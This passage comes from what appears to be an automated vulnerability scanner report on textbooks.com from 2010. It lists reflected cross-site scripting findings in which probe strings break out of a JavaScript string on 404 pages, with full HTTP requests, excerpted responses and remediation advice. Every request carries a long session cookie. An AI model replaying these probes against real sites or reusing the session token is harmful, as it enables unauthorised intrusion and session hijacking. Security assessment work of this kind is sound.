Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3630
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:53:19 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/etextbooks.php85567';c651150f7b2'

</script>
...[SNIP]...

1.58. http://www.textbooks.com/financial-aid-tips.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /financial-aid-tips.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f3de2'%3b9a01c7ac01 was submitted in the REST URL parameter 1. This input was echoed as f3de2';9a01c7ac01 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /financial-aid-tips.phpf3de2'%3b9a01c7ac01 HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3637
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:53:29 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
bj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/financial-aid-tips.phpf3de2';9a01c7ac01'

</script>
...[SNIP]...

1.59. http://www.textbooks.com/js/browse.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /js/browse.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 13b4d'%3b59c6dff461f was submitted in the REST URL parameter 1. This input was echoed as 13b4d';59c6dff461f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js13b4d'%3b59c6dff461f/browse.js HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3628
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:51:56 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
pSearchReset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/js13b4d';59c6dff461f/browse.js'

</script>
...[SNIP]...

1.60. http://www.textbooks.com/js/browse.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /js/browse.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a9fb9'%3bb75f6710835 was submitted in the REST URL parameter 2. This input was echoed as a9fb9';b75f6710835 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/browse.jsa9fb9'%3bb75f6710835 HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3628
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:51:57 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
et() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/js/browse.jsa9fb9';b75f6710835'

</script>
...[SNIP]...

1.61. http://www.textbooks.com/js/jquery-1.3.2.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /js/jquery-1.3.2.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 966f8'%3bf10ffd64761 was submitted in the REST URL parameter 1. This input was echoed as 966f8';f10ffd64761 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js966f8'%3bf10ffd64761/jquery-1.3.2.js HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3634
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:51:57 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
pSearchReset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/js966f8';f10ffd64761/jquery-1.3.2.js'

</script>
...[SNIP]...

1.62. http://www.textbooks.com/js/jquery-1.3.2.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /js/jquery-1.3.2.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b3e14'%3b0791930f4a was submitted in the REST URL parameter 2. This input was echoed as b3e14';0791930f4a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/jquery-1.3.2.jsb3e14'%3b0791930f4a HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3633
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:51:57 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...

   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/js/jquery-1.3.2.jsb3e14';0791930f4a'

</script>
...[SNIP]...

1.63. http://www.textbooks.com/js/main.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /js/main.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2f49c'%3bbd59fafbda9 was submitted in the REST URL parameter 1. This input was echoed as 2f49c';bd59fafbda9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js2f49c'%3bbd59fafbda9/main.js HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
